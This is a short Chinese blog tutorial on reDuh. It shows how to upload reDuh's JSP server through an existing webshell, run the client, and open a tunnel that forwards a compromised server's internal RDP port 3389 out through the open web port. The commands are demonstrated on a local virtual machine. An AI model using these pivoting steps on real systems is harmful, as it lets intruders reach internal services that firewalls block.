美文网首页网络安全网络与信息安全Web安全
webshell跳板——reduh的用法介绍

webshell跳板——reduh的用法介绍

作者: 老夫不才 | 来源:发表于2019-04-27 00:35 被阅读7次

    reDuh

    0x00 reduh

    经常我们拿到一个shell后,发现只将目标服务器的80端口映射到公网ip地址,无法访问其他端口,如3389或3306等

    这时可以通过reduh做一个跳板,将特定端口通过开放的80端口从内网中转发出来

    0x00 So Easy

    首先我们需要一个webshell,这里我直接在虚拟机里面写一个了

    image.png
    然后通过webshell上传reduh的服务端,在\reDuhServers\目录下
    image.png
    这里用的jsp的环境就上传一个jsp的服务端
    image.png
    上传后的地址为http://192.168.49.154:8080/reDuh.jsp

    然后本地通过命令行执行reduh的客户端(位于\reDuhClient\dist\目录下)

    java -jar reDuhClient.jar http://192.168.49.154:8080/reDuh.jsp
    
    image.png

    然后通过nc监听本地1010端口

    nc.exe -nvv 127.0.0.1 1010
    
    image.png

    然后创建隧道,以将3389端口为例

    [createTunnel]6666:127.0.0.1:3389
    
    image.png
    然后本地通过mstsc连接127.0.0.1:6666
    image.png
    这时能看到reduh本地客户端产生了流量
    image.png image.png

    这样就可以通过webshell建立其他端口的通信隧道

    相关文章

      网友评论

        本文标题:webshell跳板——reduh的用法介绍

        本文链接:https://www.haomeiwen.com/subject/msacnqtx.html